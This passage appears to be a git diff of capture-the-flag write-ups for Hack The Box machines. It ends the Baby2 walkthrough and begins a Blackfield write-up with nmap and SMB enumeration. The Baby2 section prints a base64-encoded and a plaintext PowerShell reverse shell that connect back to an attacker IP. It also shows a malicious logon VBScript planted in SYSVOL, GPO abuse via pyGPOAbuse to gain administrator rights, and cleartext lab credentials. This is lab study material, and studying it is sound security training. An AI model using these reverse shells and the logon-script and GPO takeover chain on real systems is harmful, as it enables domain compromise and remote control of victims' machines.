-APQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZ -QAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgA -xACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9A -CAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGI -AeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAAoA", 0, False -``` - -We got our payload, and since we initially put port 443 as the listener, we'll open it to get a reverse shell : - -```bash ->  sudo nc -lvnp 443 -Please touch the FIDO authenticator. -Listening on 0.0.0.0 443 -``` - -And then we copy the payload where the login is via SMB : - -```bash ->  smbclient //10.129.13.186/SYSVOL -U 'Carl.Moore%Carl.Moore' -c 'cd baby2.vl/scripts; put payload.vbs login.vbs; ls' - -putting file payload.vbs as \baby2.vl\scripts\login.vbs (11.3 kB/s) (average 11.3 kB/s) - .                                   D        0  Mon Aug 25 10:30:39 2025 - ..                                  D        0  Tue Aug 22 19:43:55 2023 - login.vbs                           A     2431  Fri Jun  5 17:35:37 2026 - -               6126847 blocks of size 4096. 1961742 blocks available -``` - -We got a connection, but no shell, so we retry : - -```bash ->  rm -rf /tmp/revshell.ps1 ->  echo -n '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.228",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = -(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBy -tes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' > /tmp/revshell.ps1 -wc -c /tmp/revshell.ps1 -500 /tmp/revshell.ps1 ->  cp login.vbs.bak payload.vbs -B64=$(iconv -f ASCII -t UTF-16LE /tmp/revshell.ps1 | base64 -w0) -printf '\nSet cmdshell = CreateObject("Wscript.Shell")\ncmdshell.Run "cmd.exe /c start /b powershell -nop -w hidden -enc %s", 0, False\n' "$B64" >> payload.vbs -python3 -c "import re; t=open('payload.vbs').read(); m=re.search(r'-enc ([^\"]+)', t); print('b64 len:', len(m.group(1)))" -b64 len: 1336 -``` - -And the same things happens, so we reset the box (10.129.234.72 was the old target). - -We re-make the payload and upload it as `login.vbs` again with listener 443 on : - -```bash ->  smbclient //10.129.13.186/SYSVOL -U 'Carl.Moore%Carl.Moore' -c 'cd baby2.vl/scripts; put payload.vbs login.vbs; ls' - -putting file payload.vbs as \baby2.vl\scripts\login.vbs (14.2 kB/s) (average 14.2 kB/s) - .                                   D        0  Mon Aug 25 10:30:39 2025 - ..                                  D        0  Tue Aug 22 19:43:55 2023 - login.vbs                           A     2451  Fri Jun  5 18:07:33 2026 - -               6126847 blocks of size 4096. 1050933 blocks available -``` - -This time, `login.vbs` is larger for some reason. - -But we still just get a connection : - -```bash ->  sudo rlwrap -cAr nc -lvnp 443 -Please touch the FIDO authenticator. -Listening on 0.0.0.0 443 -Connection received on 10.129.13.186 58259 -``` - -And it refused to get the shell again, same issue. PowerShell. - -So we'll try to get the user flag without a shell : - -```bash -Set sh = CreateObject("Wscript.Shell") -sh.Run "cmd.exe /c whoami > \\dc.baby2.vl\apps\dev\who.txt", 0, True -sh.Run "cmd.exe /c copy /Y C:\user.txt \\dc.baby2.vl\apps\dev\user.txt", 0, True -EOF ->  tail -6 payload.vbs - -MapNetworkShare "\\dc.baby2.vl\apps", "V" -MapNetworkShare "\\dc.baby2.vl\docs", "L" -Set sh = CreateObject("Wscript.Shell") -sh.Run "cmd.exe /c whoami > \\dc.baby2.vl\apps\dev\who.txt", 0, True -sh.Run "cmd.exe /c copy /Y C:\user.txt \\dc.baby2.vl\apps\dev\user.txt", 0, True ->  smbclient //10.129.13.186/SYSVOL -U 'Carl.Moore%Carl.Moore' -c 'cd baby2.vl/scripts; put payload.vbs login.vbs; ls' -putting file payload.vbs as \baby2.vl\scripts\login.vbs (7.8 kB/s) (average 7.8 kB/s) - .                                   D        0  Mon Aug 25 10:30:39 2025 - ..                                  D        0  Tue Aug 22 19:43:55 2023 - login.vbs                           A     1182  Fri Jun  5 18:13:08 2026 - -               6126847 blocks of size 4096. 1112388 blocks available -                ->  smbclient //10.129.13.186/apps -U 'Carl.Moore%Carl.Moore' -c 'cd dev; ls; get who.txt; get user.txt' -cat who.txt -cat user.txt - .                                   D        0  Fri Jun  5 18:13:25 2026 - ..                                  D        0  Thu Sep  7 21:12:59 2023 - CHANGELOG                           A      108  Thu Sep  7 21:16:15 2023 - login.vbs.lnk                       A     1800  Thu Sep  7 21:13:23 2023 - user.txt                            A       32  Wed Apr 16 11:48:10 2025 - who.txt                             A       24  Fri Jun  5 18:13:25 2026 - -               6126847 blocks of size 4096. 1136013 blocks available -getting file \dev\who.txt of size 24 as who.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) -getting file \dev\user.txt of size 32 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) -baby2\amelia.griffiths -42783b************5c38% -``` - -And fuck you PowerShell, we got the user flag and the user : amelia.griffiths. - -We see on `bloodhound` that Amelia has no direct Outbound Control Rights but as a member of the group Legacy, she has `WriteOwner` and `WriteDacl` on `GPOADM` and `GPO-MANAGEMENT`. - -We reinitialize the payload now, and add a `powershell.exe` script at the end : - -```bash ->  cp login.vbs.bak payload.vbs - ->  cat >> payload.vbs << 'EOF' -Set sh = CreateObject("Wscript.Shell") -sh.Run "powershell.exe -nop -w hidden -ep bypass -File \\dc.baby2.vl\apps\dev\run-gpoadm.ps1", 0, True -EOF -``` - -Then, we write the powershell script to put it inside the machine via Carl.Moore's SMB to get to `GPOADM` : - -```bash ->  smbclient //10.129.13.186/apps -U 'Carl.Moore%Carl.Moore' -c 'cd dev; put /tmp/PowerView.ps1 PowerView.ps1; put /tmp/run-gpoadm.ps1 run-gpoadm.ps1; ls' - -putting file /tmp/PowerView.ps1 as \dev\PowerView.ps1 (103.0 kB/s) (average 103.0 kB/s) -putting file /tmp/run-gpoadm.ps1 as \dev\run-gpoadm.ps1 (1.7 kB/s) (average 100.6 kB/s) - .                                   D        0  Fri Jun  5 18:27:57 2026 - ..                                  D        0  Thu Sep  7 21:12:59 2023 - CHANGELOG                           A      108  Thu Sep  7 21:16:15 2023 - gpoadm-done.txt                     A       60  Fri Jun  5 18:33:26 2026 - login.vbs.lnk                       A     1800  Thu Sep  7 21:13:23 2023 - PowerView.ps1                       A   770279  Fri Jun  5 18:33:44 2026 - run-gpoadm.ps1                      A      307  Fri Jun  5 18:33:45 2026 - user.txt                            A       32  Wed Apr 16 11:48:10 2025 - who.txt                             A       24  Fri Jun  5 18:26:23 2026 - -               6126847 blocks of size 4096. 1359421 blocks available                         A      143  Fri Jun  5 18:26:49 2026 -``` - -And we rebuild the login payload : - -```bash -cat >> payload.vbs << 'EOF' -Set sh = CreateObject("Wscript.Shell") -sh.Run "powershell.exe -nop -w hidden -ep bypass -File \\dc.baby2.vl\apps\dev\run-gpoadm.ps1", 0, True -EOF -tail -5 payload.vbs -wc -c payload.vbs -End Sub - -MapNetworkShare "\\dc.baby2.vl\apps", "V" -MapNetworkShare "\\dc.baby2.vl\docs", "L"Set sh = CreateObject("Wscript.Shell") -sh.Run "powershell.exe -nop -w hidden -ep bypass -File \\dc.baby2.vl\apps\dev\run-gpoadm.ps1", 0, True -1134 payload.vbs ->  smbclient //10.129.13.186/SYSVOL -U 'Carl.Moore%Carl.Moore' -c 'cd baby2.vl/scripts; put payload.vbs login.vbs; ls' - -putting file payload.vbs as \baby2.vl\scripts\login.vbs (5.4 kB/s) (average 5.4 kB/s) - .                                   D        0  Mon Aug 25 10:30:39 2025 - ..                                  D        0  Tue Aug 22 19:43:55 2023 - login.vbs                           A     1134  Fri Jun  5 18:35:21 2026 - -               6126847 blocks of size 4096. 1379427 blocks available -``` - -And we get GPO-ADM access : - -```bash ->  nxc smb dc.baby2.vl -u GPOADM -p 'Scrow123&' -smbclient //10.129.13.186/apps -U 'Carl.Moore%Carl.Moore' -c 'cd dev; get gpoadm-done.txt' -cat ~/gpoadm-done.txt -SMB         10.129.13.186   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.13.186   445    DC               [+] baby2.vl\GPOADM:Scrow123&   -getting file \dev\gpoadm-done.txt of size 60 as gpoadm-done.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) -��done baby2\amelia.griffiths - ->  nxc winrm 10.129.13.186 -u GPOADM -p 'Scrow123&' -WINRM       10.129.13.186   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:baby2.vl)   -WINRM       10.129.13.186   5985   DC               [-] baby2.vl\GPOADM:Scrow123& -``` - -We got the login working, no shell though. - -From here, we go on `bloodhound` and find "6AC1786C-016F-11D2-945F-00C04FB984F9" from `DEFAULT DOMAIN POLICY` as the GUID for `GPOADM`. - -We'll run `pyGPOabuse` to try to escalate : - -```bash ->  python3 ~/pyGPOAbuse/pygpoabuse.py baby2.vl/GPOADM:'Scrow123&' -gpo-id 6AC1786C-016F-11D2-945F-00C04FB984F9 -command 'net localgroup administrators GPOADM /add' -f - -[+] ScheduledTask TASK_30a864d9 created! - ->  nxc winrm 10.129.13.186 -u GPOADM -p 'Scrow123&' -WINRM       10.129.13.186   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:baby2.vl)   -WINRM       10.129.13.186   5985   DC               [-] baby2.vl\GPOADM:Scrow123& -``` - -It seems we got the wrong GUID, so we'll do an ldapsearch for it : - -```bash ->  ldapsearch -x -H ldap://dc.baby2.vl -D 'baby2\GPOADM' -w 'Scrow123&' -b 'CN=Policies,CN=System,DC=baby2,DC=vl' '(objectClass=groupPolicyContainer)' cn displayName - -# extended LDIF -# -# LDAPv3 -# base with scope subtree -# filter: (objectClass=groupPolicyContainer) -# requesting: cn displayName   -# - -# {31B2F340-016D-11D2-945F-00C04FB984F9}, Policies, System, baby2.vl -dn: CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=baby2,D -C=vl -cn: {31B2F340-016D-11D2-945F-00C04FB984F9} -displayName: Default Domain Policy - -# {6AC1786C-016F-11D2-945F-00C04fB984F9}, Policies, System, baby2.vl -dn: CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=baby2,D -C=vl -cn: {6AC1786C-016F-11D2-945F-00C04fB984F9} -displayName: Default Domain Controllers Policy - -# search result -search: 2 -result: 0 Success - -# numResponses: 3 -# numEntries: 2 -``` - -There is another GUID, we'll retry : - -```bash ->  python3 ~/pyGPOAbuse/pygpoabuse.py baby2.vl/GPOADM:'Scrow123&' -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -command 'net localgroup administrators GPOADM /add' -f - -[+] ScheduledTask TASK_3fbf4c6d created! - ->  nxc winrm 10.129.13.186 -u GPOADM -p 'Scrow123&' -WINRM       10.129.13.186   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:baby2.vl)   -WINRM       10.129.13.186   5985   DC               [+] baby2.vl\GPOADM:Scrow123& (Pwn3d!) -``` - -And we got it ! We got added to `localgroup administrators`. - -```bash ->  evil-winrm -i 10.129.13.186 -u GPOADM -p 'Scrow123&' -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems -/usr/lib/ruby/3.4.0/readline.rb:4: warning: reline was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 4.0.0. -You can add reline to your Gemfile or gemspec to silence this warning. -                                         -Evil-WinRM shell v3.9 -                                         -Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline -                                         -Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion -                                         -Info: Establishing connection to remote endpoint -*Evil-WinRM* PS C:\Users\gpoadm\Documents> cd / -*Evil-WinRM* PS C:\> ls - - -   Directory: C:\ - - -Mode                 LastWriteTime         Length Name -----                 -------------         ------ ---- -d-----         4/16/2025   2:27 AM                inetpub -d-----          5/8/2021   1:20 AM                PerfLogs -d-r---         4/16/2025   1:51 AM                Program Files -d-----         8/22/2023  10:30 AM                Program Files (x86) -d-----         8/22/2023   1:10 PM                shares -d-----         8/22/2023  12:35 PM                temp -d-r---          6/5/2026   9:55 AM                Users -d-----         8/20/2025   9:05 AM                Windows --a----         4/16/2025   2:48 AM             32 user.txt - - -*Evil-WinRM* PS C:\> cd /Users -*Evil-WinRM* PS C:\Users> ls - - -   Directory: C:\Users - - -Mode                 LastWriteTime         Length Name -----                 -------------         ------ ---- -d-----         8/22/2023  10:08 AM                Administrator -d-----         4/16/2025   2:24 AM                Amelia.Griffiths -d-----          6/5/2026   9:55 AM                gpoadm -d-r---         8/22/2023  10:08 AM                Public - - -*Evil-WinRM* PS C:\Users> cd /Users/Administrator/Desktop -*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt -2935009**********5740f9 -``` - -And rooted ! diff --git a/Blackfield HTB [HARD].md b/Blackfield HTB [HARD].md deleted file mode 100644 index 41d92df..0000000 --- a/Blackfield HTB [HARD].md +++ /dev/null @@ -1,1827 +0,0 @@ -Target : 10.129.229.17 - -Date : 11/06/2026 - -```bash ->  echo "10.129.229.17 blackfield.htb" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. ->  nmap -sC -sV -O -Pn -p- --min-rate=3000 -T4 10.129.229.17 -Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-11 21:11 +0200 -Nmap scan report for blackfield.htb (10.129.229.17) -Host is up (0.14s latency). -Not shown: 65529 filtered tcp ports (no-response) -PORT     STATE SERVICE    VERSION -53/tcp   open  tcpwrapped -88/tcp   open  tcpwrapped -135/tcp  open  tcpwrapped -445/tcp  open  tcpwrapped -593/tcp  open  tcpwrapped -5985/tcp open  tcpwrapped -Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port -Device type: general purpose -Running (JUST GUESSING): Microsoft Windows 2019|10 (96%) -OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 -Aggressive OS guesses: Microsoft Windows Server 2019 (96%), Microsoft Windows 10 1903 - 22H2 (88%) -No exact OS matches for host (test conditions non-ideal). - -Host script results: -| smb2-time:   -|   date: 2026-06-12T02:12:29 -|_  start_date: N/A -|_clock-skew: 6h59m59s -| smb2-security-mode:   -|   3.1.1:   -|_    Message signing enabled and required - -OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . -Nmap done: 1 IP address (1 host up) scanned in 126.23 seconds -``` - -The first fullport scan is strange : it tells us it might be an `Active Directory` with ports `Kerberos 88/tcp` `msrpc 135/tcp` and `rpc over http 593/tcp` as well as `smb 445/tcp` everything is `tcpwrapped` and no `389/tcp` LDAP, with also port `DNS 53/tcp`. - -We'll first try to get into samba using `netexec` and `guest` : - -```bash ->  nxc smb 10.129.229.17 -u guest -p '' -SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\guest:   ->  nxc smb 10.129.229.17 -u guest -p '' --shares -SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\guest:   -SMB         10.129.229.17   445    DC01             [*] Enumerated shares -SMB         10.129.229.17   445    DC01             Share           Permissions     Remark -SMB         10.129.229.17   445    DC01             -----           -----------     ------ -SMB         10.129.229.17   445    DC01             ADMIN$                          Remote Admin -SMB         10.129.229.17   445    DC01             C$                              Default share -SMB         10.129.229.17   445    DC01             forensic                        Forensic / Audit share. -SMB         10.129.229.17   445    DC01             IPC$            READ            Remote IPC -SMB         10.129.229.17   445    DC01             NETLOGON                        Logon server share   -SMB         10.129.229.17   445    DC01             profiles$       READ              -SMB         10.129.229.17   445    DC01             SYSVOL                          Logon server share -``` - -We can get in, with a `READ` write on `profile$` and a `forensic` share that looks interesting. -This is indeed a `DC`. - -We'll explore the `profile$`. - -```bash -smb: \> ls - .                                   D        0  Wed Jun  3 18:47:12 2020 - ..                                  D        0  Wed Jun  3 18:47:12 2020 - AAlleni                             D        0  Wed Jun  3 18:47:11 2020 - ABarteski                           D        0  Wed Jun  3 18:47:11 2020 - ABekesz                             D        0  Wed Jun  3 18:47:11 2020 - ABenzies                            D        0  Wed Jun  3 18:47:11 2020 - ABiemiller                          D        0  Wed Jun  3 18:47:11 2020 - AChampken                           D        0  Wed Jun  3 18:47:11 2020 - ACheretei                           D        0  Wed Jun  3 18:47:11 2020 - ACsonaki                            D        0  Wed Jun  3 18:47:11 2020 - AHigchens                           D        0  Wed Jun  3 18:47:11 2020 - AJaquemai                           D        0  Wed Jun  3 18:47:11 2020 - AKlado                              D        0  Wed Jun  3 18:47:11 2020 - AKoffenburger                       D        0  Wed Jun  3 18:47:11 2020 - AKollolli                           D        0  Wed Jun  3 18:47:11 2020 - AKruppe                             D        0  Wed Jun  3 18:47:11 2020 - AKubale                             D        0  Wed Jun  3 18:47:11 2020 - ALamerz                             D        0  Wed Jun  3 18:47:11 2020 - AMaceldon                           D        0  Wed Jun  3 18:47:11 2020 - AMasalunga                          D        0  Wed Jun  3 18:47:11 2020 - ANavay                              D        0  Wed Jun  3 18:47:11 2020 - ANesterova                          D        0  Wed Jun  3 18:47:11 2020 - ANeusse                             D        0  Wed Jun  3 18:47:11 2020 - AOkleshen                           D        0  Wed Jun  3 18:47:11 2020 - APustulka                           D        0  Wed Jun  3 18:47:11 2020 - ARotella                            D        0  Wed Jun  3 18:47:11 2020 - ASanwardeker                        D        0  Wed Jun  3 18:47:11 2020 - AShadaia                            D        0  Wed Jun  3 18:47:11 2020 - ASischo                             D        0  Wed Jun  3 18:47:11 2020 - ASpruce                             D        0  Wed Jun  3 18:47:11 2020 - ATakach                             D        0  Wed Jun  3 18:47:11 2020 - ATaueg                              D        0  Wed Jun  3 18:47:11 2020 - ATwardowski                         D        0  Wed Jun  3 18:47:11 2020 - audit2020                           D        0  Wed Jun  3 18:47:11 2020 - AWangenheim                         D        0  Wed Jun  3 18:47:11 2020 - AWorsey                             D        0  Wed Jun  3 18:47:11 2020 - AZigmunt                            D        0  Wed Jun  3 18:47:11 2020 - BBakajza                            D        0  Wed Jun  3 18:47:11 2020 - BBeloucif                           D        0  Wed Jun  3 18:47:11 2020 - BCarmitcheal                        D        0  Wed Jun  3 18:47:11 2020 - BConsultant                         D        0  Wed Jun  3 18:47:11 2020 - BErdossy                            D        0  Wed Jun  3 18:47:11 2020 - BGeminski                           D        0  Wed Jun  3 18:47:11 2020 - BLostal                             D        0  Wed Jun  3 18:47:11 2020 - BMannise                            D        0  Wed Jun  3 18:47:11 2020 - BNovrotsky                          D        0  Wed Jun  3 18:47:11 2020 - BRigiero                            D        0  Wed Jun  3 18:47:11 2020 - BSamkoses                           D        0  Wed Jun  3 18:47:11 2020 - BZandonella                         D        0  Wed Jun  3 18:47:11 2020 - CAcherman                           D        0  Wed Jun  3 18:47:12 2020 - CAkbari                             D        0  Wed Jun  3 18:47:12 2020 - CAldhowaihi                         D        0  Wed Jun  3 18:47:12 2020 - CArgyropolous                       D        0  Wed Jun  3 18:47:12 2020 - CDufrasne                           D        0  Wed Jun  3 18:47:12 2020 - CGronk                              D        0  Wed Jun  3 18:47:11 2020 - Chiucarello                         D        0  Wed Jun  3 18:47:11 2020 - Chiuccariello                       D        0  Wed Jun  3 18:47:12 2020 - CHoytal                             D        0  Wed Jun  3 18:47:12 2020 - CKijauskas                          D        0  Wed Jun  3 18:47:12 2020 - CKolbo                              D        0  Wed Jun  3 18:47:12 2020 - CMakutenas                          D        0  Wed Jun  3 18:47:12 2020 - CMorcillo                           D        0  Wed Jun  3 18:47:11 2020 - CSchandall                          D        0  Wed Jun  3 18:47:12 2020 - CSelters                            D        0  Wed Jun  3 18:47:12 2020 - CTolmie                             D        0  Wed Jun  3 18:47:12 2020 - DCecere                             D        0  Wed Jun  3 18:47:12 2020 - DChintalapalli                      D        0  Wed Jun  3 18:47:12 2020 - DCwilich                            D        0  Wed Jun  3 18:47:12 2020 - DGarbatiuc                          D        0  Wed Jun  3 18:47:12 2020 - DKemesies                           D        0  Wed Jun  3 18:47:12 2020 - DMatuka                             D        0  Wed Jun  3 18:47:12 2020 - DMedeme                             D        0  Wed Jun  3 18:47:12 2020 - DMeherek                            D        0  Wed Jun  3 18:47:12 2020 - DMetych                             D        0  Wed Jun  3 18:47:12 2020 - DPaskalev                           D        0  Wed Jun  3 18:47:12 2020 - DPriporov                           D        0  Wed Jun  3 18:47:12 2020 - DRusanovskaya                       D        0  Wed Jun  3 18:47:12 2020 - DVellela                            D        0  Wed Jun  3 18:47:12 2020 - DVogleson                           D        0  Wed Jun  3 18:47:12 2020 - DZwinak                             D        0  Wed Jun  3 18:47:12 2020 - EBoley                              D        0  Wed Jun  3 18:47:12 2020 - EEulau                              D        0  Wed Jun  3 18:47:12 2020 - EFeatherling                        D        0  Wed Jun  3 18:47:12 2020 - EFrixione                           D        0  Wed Jun  3 18:47:12 2020 - EJenorik                            D        0  Wed Jun  3 18:47:12 2020 - EKmilanovic                         D        0  Wed Jun  3 18:47:12 2020 - ElKatkowsky                         D        0  Wed Jun  3 18:47:12 2020 - EmaCaratenuto                       D        0  Wed Jun  3 18:47:12 2020 - EPalislamovic                       D        0  Wed Jun  3 18:47:12 2020 - EPryar                              D        0  Wed Jun  3 18:47:12 2020 - ESachhitello                        D        0  Wed Jun  3 18:47:12 2020 - ESariotti                           D        0  Wed Jun  3 18:47:12 2020 - ETurgano                            D        0  Wed Jun  3 18:47:12 2020 - EWojtila                            D        0  Wed Jun  3 18:47:12 2020 - FAlirezai                           D        0  Wed Jun  3 18:47:12 2020 - FBaldwind                           D        0  Wed Jun  3 18:47:12 2020 - FBroj                               D        0  Wed Jun  3 18:47:12 2020 - FDeblaquire                         D        0  Wed Jun  3 18:47:12 2020 - FDegeorgio                          D        0  Wed Jun  3 18:47:12 2020 - FianLaginja                         D        0  Wed Jun  3 18:47:12 2020 - FLasokowski                         D        0  Wed Jun  3 18:47:12 2020 - FPflum                              D        0  Wed Jun  3 18:47:12 2020 - FReffey                             D        0  Wed Jun  3 18:47:12 2020 - GaBelithe                           D        0  Wed Jun  3 18:47:12 2020 - Gareld                              D        0  Wed Jun  3 18:47:12 2020 - GBatowski                           D        0  Wed Jun  3 18:47:12 2020 - GForshalger                         D        0  Wed Jun  3 18:47:12 2020 - GGomane                             D        0  Wed Jun  3 18:47:12 2020 - GHisek                              D        0  Wed Jun  3 18:47:12 2020 - GMaroufkhani                        D        0  Wed Jun  3 18:47:12 2020 - GMerewether                         D        0  Wed Jun  3 18:47:12 2020 - GQuinniey                           D        0  Wed Jun  3 18:47:12 2020 - GRoswurm                            D        0  Wed Jun  3 18:47:12 2020 - GWiegard                            D        0  Wed Jun  3 18:47:12 2020 - HBlaziewske                         D        0  Wed Jun  3 18:47:12 2020 - HColantino                          D        0  Wed Jun  3 18:47:12 2020 - HConforto                           D        0  Wed Jun  3 18:47:12 2020 - HCunnally                           D        0  Wed Jun  3 18:47:12 2020 - HGougen                             D        0  Wed Jun  3 18:47:12 2020 - HKostova                            D        0  Wed Jun  3 18:47:12 2020 - IChristijr                          D        0  Wed Jun  3 18:47:12 2020 - IKoledo                             D        0  Wed Jun  3 18:47:12 2020 - IKotecky                            D        0  Wed Jun  3 18:47:12 2020 - ISantosi                            D        0  Wed Jun  3 18:47:12 2020 - JAngvall                            D        0  Wed Jun  3 18:47:12 2020 - JBehmoiras                          D        0  Wed Jun  3 18:47:12 2020 - JDanten                             D        0  Wed Jun  3 18:47:12 2020 - JDjouka                             D        0  Wed Jun  3 18:47:12 2020 - JKondziola                          D        0  Wed Jun  3 18:47:12 2020 - JLeytushsenior                      D        0  Wed Jun  3 18:47:12 2020 - JLuthner                            D        0  Wed Jun  3 18:47:12 2020 - JMoorehendrickson                   D        0  Wed Jun  3 18:47:12 2020 - JPistachio                          D        0  Wed Jun  3 18:47:12 2020 - JScima                              D        0  Wed Jun  3 18:47:12 2020 - JSebaali                            D        0  Wed Jun  3 18:47:12 2020 - JShoenherr                          D        0  Wed Jun  3 18:47:12 2020 - JShuselvt                           D        0  Wed Jun  3 18:47:12 2020 - KAmavisca                           D        0  Wed Jun  3 18:47:12 2020 - KAtolikian                          D        0  Wed Jun  3 18:47:12 2020 - KBrokinn                            D        0  Wed Jun  3 18:47:12 2020 - KCockeril                           D        0  Wed Jun  3 18:47:12 2020 - KColtart                            D        0  Wed Jun  3 18:47:12 2020 - KCyster                             D        0  Wed Jun  3 18:47:12 2020 - KDorney                             D        0  Wed Jun  3 18:47:12 2020 - KKoesno                             D        0  Wed Jun  3 18:47:12 2020 - KLangfur                            D        0  Wed Jun  3 18:47:12 2020 - KMahalik                            D        0  Wed Jun  3 18:47:12 2020 - KMasloch                            D        0  Wed Jun  3 18:47:12 2020 - KMibach                             D        0  Wed Jun  3 18:47:12 2020 - KParvankova                         D        0  Wed Jun  3 18:47:12 2020 - KPregnolato                         D        0  Wed Jun  3 18:47:12 2020 - KRasmor                             D        0  Wed Jun  3 18:47:12 2020 - KShievitz                           D        0  Wed Jun  3 18:47:12 2020 - KSojdelius                          D        0  Wed Jun  3 18:47:12 2020 - KTambourgi                          D        0  Wed Jun  3 18:47:12 2020 - KVlahopoulos                        D        0  Wed Jun  3 18:47:12 2020 - KZyballa                            D        0  Wed Jun  3 18:47:12 2020 - LBajewsky                           D        0  Wed Jun  3 18:47:12 2020 - LBaligand                           D        0  Wed Jun  3 18:47:12 2020 - LBarhamand                          D        0  Wed Jun  3 18:47:12 2020 - LBirer                              D        0  Wed Jun  3 18:47:12 2020 - LBobelis                            D        0  Wed Jun  3 18:47:12 2020 - LChippel                            D        0  Wed Jun  3 18:47:12 2020 - LChoffin                            D        0  Wed Jun  3 18:47:12 2020 - LCominelli                          D        0  Wed Jun  3 18:47:12 2020 - LDruge                              D        0  Wed Jun  3 18:47:12 2020 - LEzepek                             D        0  Wed Jun  3 18:47:12 2020 - LHyungkim                           D        0  Wed Jun  3 18:47:12 2020 - LKarabag                            D        0  Wed Jun  3 18:47:12 2020 - LKirousis                           D        0  Wed Jun  3 18:47:12 2020 - LKnade                              D        0  Wed Jun  3 18:47:12 2020 - LKrioua                             D        0  Wed Jun  3 18:47:12 2020 - LLefebvre                           D        0  Wed Jun  3 18:47:12 2020 - LLoeradeavilez                      D        0  Wed Jun  3 18:47:12 2020 - LMichoud                            D        0  Wed Jun  3 18:47:12 2020 - LTindall                            D        0  Wed Jun  3 18:47:12 2020 - LYturbe                             D        0  Wed Jun  3 18:47:12 2020 - MArcynski                           D        0  Wed Jun  3 18:47:12 2020 - MAthilakshmi                        D        0  Wed Jun  3 18:47:12 2020 - MAttravanam                         D        0  Wed Jun  3 18:47:12 2020 - MBrambini                           D        0  Wed Jun  3 18:47:12 2020 - MHatziantoniou                      D        0  Wed Jun  3 18:47:12 2020 - MHoerauf                            D        0  Wed Jun  3 18:47:12 2020 - MKermarrec                          D        0  Wed Jun  3 18:47:12 2020 - MKillberg                           D        0  Wed Jun  3 18:47:12 2020 - MLapesh                             D        0  Wed Jun  3 18:47:12 2020 - MMakhsous                           D        0  Wed Jun  3 18:47:12 2020 - MMerezio                            D        0  Wed Jun  3 18:47:12 2020 - MNaciri                             D        0  Wed Jun  3 18:47:12 2020 - MShanmugarajah                      D        0  Wed Jun  3 18:47:12 2020 - MSichkar                            D        0  Wed Jun  3 18:47:12 2020 - MTemko                              D        0  Wed Jun  3 18:47:12 2020 - MTipirneni                          D        0  Wed Jun  3 18:47:12 2020 - MTonuri                             D        0  Wed Jun  3 18:47:12 2020 - 